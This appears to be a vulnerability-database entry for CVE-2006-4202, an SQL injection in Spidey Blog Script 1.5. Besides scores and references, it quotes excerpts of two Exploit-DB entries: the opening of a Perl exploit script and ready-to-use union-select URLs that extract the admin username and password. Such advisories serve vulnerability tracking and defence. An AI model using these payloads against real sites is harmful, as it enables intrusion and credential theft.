CVE-2006-4202
published 2006-08-17
CVE-2006-4202: SQL injection vulnerability in proje_goster.php in Spidey Blog Script 1.5 and earlier allows remote attackers to execute arbitrary SQL commands via the pid…
Priority P341 | high | 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.25% (65.7th percentile)
SQL injection vulnerability in proje_goster.php in Spidey Blog Script 1.5 and earlier allows remote attackers to execute arbitrary SQL commands via the pid parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| spidey_blog | spidey_blog_script | <= 1.5 | — |
No detection rules found.
Exploit-DB
Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (2)
exploitdb·2006-09-24
---
#!usr/bin/perl
#Author : gega
#Google : "Spidey Blog Script (c) v1.5"
#SpideyBlog 1.5 Sql Injection Exploit
#Author Mail : gega.tr[at]gmail[dot]com
#Powered by e-hack.org
#Vulnerability by Asianeagle.
#Vulnerability Link : http://milw0rm.com/exploits/2186
use LWP::Simple;
print "\n==============================\n";
print "== Spidey Blog v1.5 ==\n";
print "== Sql Injection Exploit ==\n";
print "== Author : gega ==\n";
print "==============================\n\n";
if(!$ARGV[0] or !$ARGV[0]=~/http/ or !$ARGV[1] or ($ARGV[1] ne 'password' and $ARGV[1] ne 'nick'))
{
print "Usage : perl $0 [path] [function]\n";
print "path ==> http://www.example.com/blog/\n";
print "function ==> nick OR password\n";
print "Example : perl $0 ht
Exploit-DB
Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (1)
exploitdb·2006-08-14
---
###############################################################
#Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability #
#Author : ASIANEAGLE #
#Site : www.asianeagle.org #
#Contact: [email protected] #
###############################################################
#Risk : High
#Download Link Of Spidey Blog : http://www.aspindir.com/Kategoriler/ASP/bloglar
#Exploit;
#Admin Nick;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201
#Admin Password;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201
#Greetz: Str0ke
Forever milw0rm ;)
# milw
No writeups or analysis indexed.
http://secunia.com/advisories/21482
http://www.securityfocus.com/bid/19518
https://exchange.xforce.ibmcloud.com/vulnerabilities/28374
https://www.exploit-db.com/exploits/2186
2006-08-17: Published